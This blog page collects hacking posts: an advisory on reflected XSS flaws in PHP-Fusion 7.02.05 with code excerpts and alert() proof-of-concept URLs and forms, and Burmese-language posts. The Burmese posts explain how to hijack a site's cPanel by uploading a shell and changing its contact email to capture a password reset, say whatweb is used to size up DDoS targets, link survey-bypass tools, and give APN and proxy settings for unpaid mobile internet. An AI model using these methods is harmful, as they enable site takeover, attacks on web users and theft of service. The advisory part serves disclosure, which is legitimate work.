Blogger Widgets

Monday, May 27, 2013

PHP-Fusion 7.02.05 XSS


https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcSHtyiEFujDPkerw0g-JWdVmK35nPnYhLvBlkALg4WY_8dujydcBg 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PHP-Fusion is a light-weight open-source content management system (CMS) written in PHP 5. It utilises a MySQL database to store your site content and includes a simple, comprehensive administration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages.


http://www.php-fusion.co.uk/news.php

http://sourceforge.net/projects/php-fusion/



Vulnerable is version 7.02.05 and possibly older versions.


New, patched version 7.02.06 available here:


http://www.php-fusion.co.uk/news.php?readmore=569

http://www.php-fusion.co.uk/downloads.ph...oad_id=264


Reflected XSS in "forum/viewthread.php"

Reason: insufficient sanitization of html output
Attack vector: user-supplied GET parameter "highlight"
Preconditions:
1. there must exist at least one forum thread

Php script "forum/viewthread.php" line 361:


Code:
// highlight jQuery plugin
    if (isset($_GET['highlight'])) {
        $words = explode(" ", urldecode($_GET['highlight']));
        $higlight = ""; $i = 1; $c_words = count($words);
        foreach ($words as $hlight) {
            $higlight .= "'".$hlight."'";
            $higlight .= ($i < $c_words ? "," : "");
            $i++;
        }
        add_to_head("<script type='text/javascript' src='".INCLUDES."jquery/jquery.highlight.js'></script>");
        $highlight_js .=   "jQuery('.search_result').highlight([".$higlight."],{wordsOnly:true});";
Test (parameter "thread_id" must be valid):

http://localhost/phpfusion70205/forum/viewthread.php?thread_id=20&highlight=%2527]);});alert(123);/*

Reflected XSS in "messages.php"
Reason:
1. uninitialized variables "$user_list" and "$user_types"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "user_list", "user_types"
Preconditions:
1. logged in as user
2. register_globals=on

Php script "messages.php" line 482:
Code:
if ($_GET['msg_send'] == "0") {
    echo "<select name='msg_send' class='textbox'>\n".$user_list."</select>\n";
Test:
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/messages.php?msg_send=0" method="post">
<input type="hidden" name="chk_sendtoall" value="0">
<input type="hidden" name="user_list" value="</select><script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>
Similar problem is related to variable "$user_types", only in this case admin
access level is needed:

Php script "messages.php" line 490:
Code:
if (iADMIN && !isset($_GET['msg_id'])) {
    echo "<label><input name='chk_sendtoall' type='checkbox' ".$sendtoall_chk." />\n";
    echo "".$locale['434'].":</label> <select name='msg_to_group' class='textbox'>\n".$user_types."</select>\n";

Reflected XSS in "infusions/shoutbox_panel/shoutbox_admin.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with shoutbox administration privileges
2. register_globals=on

Php script "infusions/shoutbox_panel/shoutbox_admin.php" line 149:
Code:
if (isset($message) && $message != "") {
echo "<div id='close-message'><div class='admin-message'>".$message."</div></div>\n"; }
Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/infusions/shoutbox_panel/shoutbox_admin.php?
aid=e017e24eb00e8ccf&page=settings&message=<body+onload=alert(123);+

Reflected XSS in "administration/news.php"
Reason:
1. uninitialized variable "$message"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "message"
Preconditions:
1. logged in as admin with news administration privileges
2. register_globals=on

Php script "administration/news.php" line 31:
Code:
if (isset($_GET['error']) && isnum($_GET['error'])) {
    if ($_GET['error'] == 1) {
        $message = $locale['413'];
...
    if ($message) {    echo "<div id='close-message'>
      <div class='admin-message'>".$message."</div></div>\n"; }
}
if (isset($_GET['status'])) {
    if ($_GET['status'] == "sn") {
        $message = $locale['410'];
...
    if ($message) {    echo "<div id='close-message'>
      <div class='admin-message'>".$message."</div></div>\n"; }
}
Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&error=9&message=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news.php?aid=0ebd6f54040890e8
&status=1&message=<body+onload=alert(123);+

Reflected XSS in "administration/panel_editor.php"
Reason:
1. uninitialized variable "$panel_list"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "panel_list"
Preconditions:
1. logged in as admin with panel editing privileges
2. register_globals=on

Php script "administration/panel_editor.php" line 32:
Code:
while ($folder = readdir($temp)) {
    if (!in_array($folder, array(".","..")) && strstr($folder, "_panel")) {
        if (is_dir(INFUSIONS.$folder)) $panel_list[] = $folder;
    }
}
...
for ($i=0;$i < count($panel_list);$i++) {
        echo "<option".($panel_filename == $panel_list[$i] ?
            " selected='selected'" : "").">".$panel_list[$i]."</option>\n";
Test (parameter "aid" needs to be valid):
Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/panel_editor.php?aid=e017e24eb00e8ccf" method="post">
<input type="hidden" name="panel_list[]" value="<script>alert(123);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Reflected XSS in "administration/phpinfo.php"
Reason: insufficient sanitization of html output
Attack vector: User-Agent string
Preconditions:
1. logged in as admin with php info view privileges

Php script "administration/phpinfo.php" line 46:
Code:
$phpinfo .= "<tr>\n<td class='tbl2' style='width:20%'>".$locale['410']."</td>
<td class='tbl1' style='text-align:right'>".$_SERVER['HTTP_USER_AGENT']."</td></tr>\n";

Reflected XSS in "administration/bbcodes.php"
Reason:
1. uninitialized variable "$__BBCODE__"
2. insufficient sanitization of html output
Attack vector: user-supplied parameter "__BBCODE__"
Preconditions:
1. logged in as admin with bbcode settings change privileges
2. register_globals=on

Php script "administration/bbcodes.php" line 141:
Code:
echo "<td class='$cls'>".$__BBCODE__[0]['description']."</td>\n";
echo "<td class='$cls'>".$__BBCODE__[0]['usage']."</td>\n";

Test (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][description]=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/bbcodes.php?aid=693ec1754cc0b042
&__BBCODE__[0][usage]=<body+onload=alert(123);+

Reflected XSS in multiple admin scripts, affected parameter "errorMessage"
Reason:
1. uninitialized variables "$error" and "$errorMessage"
2. insufficient sanitization of html output
Attack vector: user-supplied parameters "error" and "errorMessage"
Preconditions:
1. logged in as admin with appropriate privileges
2. register_globals=on

Php script "administration/article_cats.php" line 110:
Code:
if (isset($error) && isnum($error)) {
        if ($error == 1) {
            $errorMessage = $locale['460'];
        } elseif ($error == 2) {
            $errorMessage = $locale['461'];
        }
        if ($errorMessage) { echo "<div id='close-message'>
          <div class='admin-message'>".$errorMessage."</div></div>\n"; }

The same vulnerability exists in four different admin scripts:

1. administration/article_cats.php
2. administration/download_cats.php
3. administration/news_cats.php
4. administration/weblink_cats.php

Tests (parameter "aid" needs to be valid):

http://localhost/phpfusion70205/administration/article_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/download_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/news_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

http://localhost/phpfusion70205/administration/weblink_cats.php?
aid=6242719852b67e0e&error=3&errorMessage=<body+onload=alert(123);+

Reflected XSS in "administration/articles.php"
Reason: insufficient sanitization of html output
Attack vector: user-supplied POST parameters "body" and "body2"
Preconditions:
1. logged in as admin with articles administration privileges

Php script "administration/articles.php" line 70:
Code:
$bodypreview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body']));
$body2preview = str_replace("src='".str_replace("../", "", IMAGES_A),
"src='".IMAGES_A, stripslash($_POST['body2']));
...
echo $bodypreview."\n";
...
echo $body2preview."\n";
Test (parameter "aid" needs to be valid):

Code:
<html><body><center>
<form action="http://localhost/phpfusion70205/administration/articles.php?aid=0ebd6f54040890e8" method="post">
<input type="hidden" name="preview" value="1">
<input type="hidden" name="body" value="<script>alert(123);</script>">
<input type="hidden" name="body2" value="<script>alert(321);</script>">
<input type="submit" value="Test">
</form>
</center></body></html>

Website တစ္ခုရဲ ့ Cpanel ကို အလြယ္ဆုံးနည္းနဲ ့ Hack မယ္

https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTpvpLk9QKQ7RnxtT1UyXZgokwqiubRmGXeryZiGoOu1Gr-zDK6



ခုနည္းကို သုံးမယ္ဆုိရင္ေတာ့ အရင္ဆုံး မိမိ Hack
လုပ္ခ်င္တဲ့ ဆုိဒ္မွာ Shell တင္ထားဖုိ ့လုိပါတယ္။
ျပီးသြားရင္ Shell မွ ပတ္လမ္းတစ္ခုၾကည့္ရပါမယ္..
. အဲ့မွာ /home/user/public_html/
ဆုိတာရွိပါတယ္ ..
 ေအာက္ပုံလုိမ်ဳိးေပ့ါ..

http://img855.imageshack.us/img855/8901/lgtce2a.png
ဒီမွာေတာ့ /home/user/Public_html/ အစား /home/fortun03/public_html/ လုိ ့ျဖစ္ေနပါတယ္..
ဆုိလုိခ်င္တာကေတာ့ /user/ ဆုိတဲ့ေနရာမွာ website Db List name ျဖစ္ေနမွာပါ..(တစ္ဆုိဒ္နဲ ့တစ္ဆုိဒ္ မတူဘူးေပ့ါဗ်ာ။) ဒီေတာ့ အဲ့ /user/ ကုိ ကလစ္နုိပ္ရပါမယ္။ ဒီေတာ့ /home/user/ လုိ ့ျဖစ္သြားပါမယ္။
ကြ်န္ေတာ္ပုံမွာကေတာ့ /home/fortun03/ လုိ ့ျဖစ္သြားမယ္ေပ့ါဗ်ာ... တစ္ခုနဲ ့တစ္ခု မတူလုိ ့ပါ။
ေအာက္ကပုံေလးဆက္ၾကည့္ပါအုံး..


http://i.imgur.com/IbTKgOZ.png





 အဲ့မွာ.. .contactemail ဆိုတာ ပါပါ တယ္.. အဲ့တည္းကို ၀င္ရပါမယ္...
ပုံေတြ က ေသးထားတယ္ဗ်ာ.. ကြန္န၇ွင္ မေကာင္းတဲ့သူေတြ အဆင္ေျပေအာင္ပါ... မျမင္ရဘူးထင္ရင္ Ctrl ကို ဖိထားျပီး Mouse မွ ဘီးေလးကို ေရွ  ့တုိး ေနာက္ဆုတ္ လုပ္ျပီး ၾကည့္နုိင္ပါတယ္...
ကဲဆက္လုိက္မယ္... အဲ့ contactemail ဆုိတဲ့ ဖုိင္တည္း၀င္လုိက္ရင္ေအာက္ကလုိ မ်ဳိးလင့္ကိုျမင္ရပါမယ္.
http://img11.imageshack.us/img11/2372/lgt4eb1.png

ပုံတည္းမွာျမင္ရသလုိ Gmail လိပ္စာတစ္ခုကို ျမင္ရမွာျဖစ္ပါတယ္...
အဲ့လိပ္စာေနရာကို သင့္ G-Mail လိပ္စာလည့္ျပီး save လုပ္လုိက္ပါ..
ျပီးရင္ Host ကိုသြားျပီး Forgot password ကေန သြားလုပ္ရင္ သင္ G-Mail တည္းကို Password Restart code ကေရာက္လာမွာျဖစ္ပါတယ္..
ကဲ ဒီေလာက္ဆုိ အဆင္ေျပေလာက္မယ္ထင္ပါတယ္...
မေျပလည္း ဦးေႏွာက္နည္းနည္းသုံးျပီးစဥ္းစားလုိက္ပါ.. သူမ်ားက ဒါဆုိ ဒါ ျဖစ္ေနတဲ့ ဘ၀မ်ဳိးကုိထားခဲ့ျပီး ကို ့ လမ္းကုိ ေရႊး ျပီး ကုိ ့အေတြး ကို ခ်ဲ  ့ ေစခ်င္ပါျပီ...

Credit : Min Soe Yar Sar

Usage of What Web ( Back Track)


What is whatweb ?

What web ဆိုတာက ဘာ ၀က္လဲတဲ့ ရွင္းတယ္ေနာ္
ေျဖလုိက္ေပါ့ အသားတိုး၀က္လုိ့ :P

ဟုတ္ကဲ့ က်ေနာ္တုိ့ Website ေတြကို ဘာအမ်ိုးအစားပါ ဘယ္အုိင္ပီမွာထိုင္ထားပါတယ္
ဘာေတြ String ထားပါတယ္ ဘာဆာဗာပါ ဆိုတာကို အေသးစိတ္ရွင္းျပေပးတဲ့ဆိုက္ေလးပါ
က်ေနာ္ DDos တိုက္တုန္းကဆို ဆိုက္တစ္ခုကို က်ဖို့အတြက္ က်နုိင္မက်နုိင္ကို
ဒီေကာင္ေလးနဲ့ခ်ိန္ရပါတယ္ ဘာေတြ ဆင္ထားလဲ တုိ့ဘာတုိ့ကိုေပါ့

Terminal >>> /pentest/enumeration/web/whatweb/

ျပီးရင္ ./whatweb လို့ထည့္လုိက္
ကဲအဲ့ဒီမွာ Usage ေတြေတြ့လိမ့္မယ္
ထားလိုက္ က်ေနာ္တုိ့ စမ္းမယ္

ကဲ ./whatweb -v www.myanmar.com

က်ေနာ္ Hacking ေတြကို တင္ေပးတာက တစ္ခ်ိဳ ့Hacking ေတြကို တိုက္ရိုက္တင္ေပးသလို တစ္ခ်ိဳ ့ေတြကိုလဲ ကိုယ့္ဦးေႏွာက္နဲ ့စဥ္းစားပါလို ့ေျပာခ်င္ပါတယ္..။ က်ေနာ္တို ့ျမန္မာေတြ နည္းပညာ ပိုင္း အားနည္းေနတာ ေတြ ့ရပါတယ္..။ နည္းပညာ ဆိုတာဟာ ေကာင္းတာေကာ ဆိုးတာေကာ ပါပါတယ္.။ ေကာင္းတာခ်ည္းပဲသိထားရမယ္လို ့မဆိုလိုပါဘူး အကုန္လံုးသိထား တတ္ထားရင္ပိုေကာင္း ပါတယ္...။ လိုအပ္ရင္လိုအပ္တဲ့ေနရာမွာအသံုးခ်လို ့ရပါတယ္..။ ဒါေပမယ့္ က်ေနာ္တင္ေပးေနတာ ေတြက သူမ်ားေတြကို ဒုကၡေရာက္ဖို ့မရည္ရြယ္ပါဘူး.. က်ေနာ္တို ့ျမန္မာေတြ နည္းပညာတိုးတက္ေအာင္ ျဖန္ ့ေ၀ရံုပါလို ့ၾကိဳေျပာထားခ်င္ပါတယ္..။ အ့ဲဒါေၾကာင့္ က်ေနာ္ စကားတစ္ခြန္းေတာ့ ေျပာထားခ်င္ပါတယ္... ကိုယ္လုပ္ကိုယ္ရ ကိုယ္ျဖစ္ကိုယ္ခံ ဆိုတဲ့စကားပါ..။ က်ေနာ္ေျပာတဲ့ နည္းေတြသံုးျပီး ျပႆနာ မတက္ဘူးလို ့လဲအာမမခံပါဘူး အကယ္လို ့တက္ခ့ဲရင္လဲ ကိုယ္အျပစ္ကိုယ္ခံပါ.. က်ေနာ္ကိုေခါင္းပံုမခ်ပါနဲ ့က်ေနာ္က နည္းပညာျဖန္ ့ေ၀ေပးတာပါ.. လူတိုင္းကို ဒီအတိုင္းလုပ္ပါလို ့တိုက္တြန္းေနတာမဟုတ္ပါဘူး...။ လိုခ်င္တဲ့လူ ေလ့လာ မလိုခ်င္ရင္ မေလ့လာပါနဲ ့.။

ONLINE SURVEYS မ်ားအား ေက်ာ္ခြျခင္း





Surveys မ်ားနဲ ့ပတ္သက္ျပီးေတာ္ေတာ္မ်ားမ်ား အာ၇ုံစားေနတာေတြ ့ရပါတယ္။ ကြ်န္ေတာ္လည္းအပါအ၀င္ေပ့ါ...အထူးသျဖင့္ Download လုပ္တဲ့ဆုိဒ္ေတြ မွာ ပုိဆုိးပါတယ္။
ဒီေတာ့ အဲ့လုိ Online Surveys ေတြကို ဘယ္လုိ bypass(ေက်ာ္ျဖတ္ျခင္း) လုပ္ၾကမလဲဆုိတာပါဘဲ။.
အရင္ဆုံး မိမိ ေဒါင္းေလာ့ ဆြဲမယ့္ လင့္က survey ပါလာမယ္ဆုိရင္ေတာ့
ေအာက္က လင့္ ႏွစ္ ခုကို သြားလုိက္ပါ။
အဲ့မွာ သင့္ ေဒါင္းေလာ့ လင့္ ထည့္ဖုိ ့ Box ေလးေတြပါပါတယ္။။. အဲ့ေဘာက္ေလးေတြတည္းမွာ သင္ေဒါင္းေလာ့ ဆြဲမယ့္ လင့္ကိုထည့္လိုက္ပါ.. ျပီးရင္ေတာ့ အမ္းဒါး ေလးေခါက္လုိက္ပါ.. ျပီးရင္သူက Survey bypass လုပ္ျပီး လင့္ေလးျပန္ထုတ္ေပးပါမယ္.. အဲ့လင့္မွာ ေဒါင္းေလာ့ရယူလုိက္ရင္ အားလုံး အဆင္ေျပသြားမွာျဖစ္ပါတယ္...
ဒီေတာ့ ေအာက္ကလင့္ေလးေတြကို သြားလုိက္ၾကပါ...  Survey bypass လုပ္ဖုိ ့ၾကားခံ ေပးတဲ့လင့္ေလး၂ ခုေပ့ါဗ်ာ။ Online Survey အမ်ားစုကုိေတာ့ Bypass လုပ္ေပးပါတယ္... ဒါေပမယ့္ တစ္ခ်ဳိ ့ပာာေတြက်ေတာ့မ ရဘူးဗ်။ ကြ်န္ေတာ္ထပ္ရွာျပီး ထပ္တင္ေပးပါ့မယ္...

Link 1   -->   Link 2


Phone Bill မကုန္ေအာင္ အင္တာနက္အသုံးျပဳမယ္ (Update)


ကဲ အားလုံးပဲ ဒီတစ္ခါေတာ့ Facebook ထဲကကြ်န္ေတာ္ေဘာ္ဒါတစ္ေယာက္ဆီကေန ပုိက္ဆံမကုန္တဲ့ အင္တာနက္ဖုန္းသုံးနည္းကုိ ေဖာ္ျပလုိက္ပါတယ္။ သိထားရမွာက နည္းလမ္းေတြကုိရွာေဖြရတာဟာ အိပ္ေရးပ်က္ခံ၊ အပင္ပန္းခံျပီးရွာရတာမုိ႔ တစ္ခုခုျဖစ္ခဲ့ရင္ အျပစ္မဆုိၾကဖုိ႔ ၾကိဳတင္ျပီး သတိေပးခ်င္ပါတယ္။ ဒီပုိ႔စ္မွာ မူရင္းပုိ႔စ္ပုိင္ရွင္ ကုိယ္တုိင္စမ္းသပ္ေဖာ္ျပထားတဲ့နည္း၊ သူအသုံးျပဳခဲ့တဲ့ Device ေတြနဲ႕ဆုိရင္ေတာ့ အဆင္ေျပမွာပါ။ အျခား Device ေတြကုိလည္း ကြ်န္ေတာ္အေနနဲ႔ မစမ္းသပ္ႏုိင္လုိ႔ နားလည္ေပးေစခ်င္ပါတယ္။ ေအာက္ကပုိ႔စ္ေတြဟာ မူရင္းပုိ႔စ္ပုိင္ရွင္ရဲ႕ စာသားအတုိင္းပဲျဖစ္ပါတယ္။ စာလုံးေပါင္းသတ္ပုံေတြကုိ ျပင္ဆင္ေပးတာက လြဲလုိ႔ေပါ့။ :D
1. 3G အင္တာနက္ဖြင့္ထားေသာ Sim Card (မွတ္ခ်က္...GSM လဲရပါတယ္)
2. ကိုယ္ရဲ့ဖုန္းလံုျခံုးေရအတြက္ စိုးရိမ္တယ္ဆိုရင္ IMEI ကို Fake လုပ္ထားရပါမယ္
(ဒါကေတာ့ လိုအပ္ခ်က္မဟုတ္ပါဘူး ကြ်န္ေတာ္ကေတာ့ မလုပ္ဘူးေအးေရာ India ကဆိုရင္ေတာ့လိုမယ္)
3. လုပ္နည္းကေတာ့ APN setting ခ်ိန္းတာပါ ေအာက္မွာေဖာ္ျပထားပါတယ္။
(မွတ္ခ်က္ ကြ်န္ေတာ္ကေတာ့ Samsung Galaxy Ace နဲ့ စမ္းသပ္ထားတာျဖစ္လုိ႔
Galaxy APN ခ်ိန္းနည္းအတိုင္းတင္ျပပါမယ္)
Setting >>>Wireless and networks>>>Mobile networks>>>Acess Point Names ကိုအဆင့္ဆင့္သြားပါ ျပီးရင္ Menu key ကိုနိွပ္ျပီး New APN ကိုေရြးပါ ျပီးရင္

---Name ေနရာမွာ 3G free (any) Type 1 WAP လို့ျဖည့္လိုက္ပါ

---APN ေနရာမွာ wapwest.cellone.in လို့ေရးေပးပါ
---Proxy ေနရာမွာ 110.100.3.2 လို့ေရရးပါ
---Port ေနရာမွာ 9209 လုိ႔ေရးပါ
---User name ေနရာမွာ ppp
လုိ႔ထည့္ပါ။
---Password ေနရာမွာ ppp123 လုိ႔ေရးပါ
---Server ေနရာမွာ 110.100.3.2:9209 လုိ႔ထည့္ပါ။
---MCC ေတာ့ 414 ပါပဲ
---MNC ေတာ့ 01 ပါ
---Authentication type မွာ CHAP ကိုေရြးပါ
---APN type မွာ Internet ကိုေရြးပါ

ျပီးရင္ Save လုပ္ျပီး ခုလုပ္ထားတဲ့ APN ကို ON ခဲ့ပါ
ျပီးရင္ အင္တာနက္ကို On လိုက္ပါ သိုမဟုတ္ Use packet data ကို အမွန္ျခစ္လိုက္ပါဟုတ္ကဲ့ အင္တာနက္ မရေသးပါဘူး ရေအာင္လုပ္ရပါအံုးမယ္
ဘယ္လိုလုပ္ရမလဲဆိုေတာ့ Kali Linux OS တင္ထားတဲ့ computer မွာ usb tethering ကို on လိုက္ရပါမယ္ အင္တာနက္တက္ျပီးဆိုတာနဲ့ Moblie ကေရာ ဒါမွမဟုတ္ ျကိုက္တဲ့ ကြန္ပ်ူတာမွာသြားသံုးလို့ရပါျပီ တစ္ခါ on ခ်င္ရင္ တခါ kali ကိုေျပးရမွာေနာ္ MPT က မပိတ္သေရြ့ေတာ့ရေနပါလိမ္မယ္ ပိတ္သြားရင္ တားတားလဲမတတ္နိုင္ပု ဟိဟိ။
ျဖည့္စြက္ခ်က္။ လိုအပ္ခ်က္ တစ္ခုရိွသြားတယ္ဗ် kali မွာသံုးမွ မျဖတ္တာ က်န္တာေတြမွာျဖတ္တယ္ေနာ္ ျပီးေတာ့ ကြန္ပ်ဴတာမပိတ္ခင္ အင္တာနက္အရင္ပိတ္ရတယ္။ မေန့က kali OS (Gnome) နဲ့ သံုးတာ မျဖတ္လို႔ ဒီေန႔ backtrak နဲ့သံုးေတာ့ ျဖတ္သြားတယ္ မေက်နပ္လို့ kali နဲ့ ျပန္သံုးတာ မျဖတ္ဘူး kali ကိုနဲ့အဆက္သြယ္မျဖတ္ခင္ အင္တာနက္ကိုအရင္ပိတ္ဖို့မေမ့နဲ့အံုးဗ်
Screenshot:
 
Kali Linux ကုိ ေဒါင္းခ်င္ရင္ ဒီ ကုိသြားပါ။
Kali OS, BT ေတြအေၾကာင္းအေသးစိတ္သိခ်င္ ဒီ ဂရုကုိသြားပါ။ 
Credit : Min Soe Yar Sar
Special Credit: Than Moe 

Free Backlinks
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews